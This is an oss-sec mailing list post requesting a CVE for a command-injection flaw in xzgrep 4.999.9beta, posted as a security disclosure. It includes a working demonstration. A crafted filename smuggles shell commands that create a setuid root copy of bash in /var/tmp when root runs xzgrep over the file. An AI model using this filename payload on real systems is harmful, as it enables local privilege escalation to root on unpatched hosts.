oss-sec mailing list archives
CVE request: xzgrep 4.999.9beta arbitrary code execution vulnerability
From: Bart Dopheide <dopheide () fmf nl>
Date: Mon, 18 May 2015 13:16:33 +0200
I discovered a bug in xzgrep 4.999.9beta. Please assign a CVE for this vulnerability. * Affected versions: 4.999.9beta * Fixed versions: 5.0.0 and up, 5.2.0 and up * Description: xzgrep 4.999.9beta processes filenames containing a semicolon incorrectly, which allows for arbitrary code execution as the local user running xzgrep. Demonstration of the vulnerability: sh-4.1$ touch /tmp/semi\;colon sh-4.1$ xzgrep anystring /tmp/semi\;colon xz: /tmp/semi: No such file or directory /usr/bin/xzgrep: line 199: colon: command not found sh-4.1$ xzgrep tries extract/grep /tmp/semi and tries to execute "colon", which is obviously not wanted. With a specially crafted filename and three ounces of social engineering, a local root exploit is possible. For example: sh-4.1$ touch '/var/tmp/;echo -e "cp -p \0057bin\0057bash \0057var\0057tmp\0057\nchmod u+s \0057var\0057tmp\0057bash"
zzz;sh zzz;rm -f zzz'
sh-4.1# find /var/tmp -type f -exec xzgrep anystring {} \+ A suid root /var/tmp/bash should be the result. I checked RHEL 6, CentOS 6: they run 4.999.9beta and they are vulnerable. -- Bart Dopheide
Attachment:
signature.asc
Description: Digital signature
Current thread:
- CVE request: xzgrep 4.999.9beta arbitrary code execution vulnerability Bart Dopheide (May 18)
- Re: CVE request: xzgrep 4.999.9beta arbitrary code execution vulnerability cve-assign (May 19)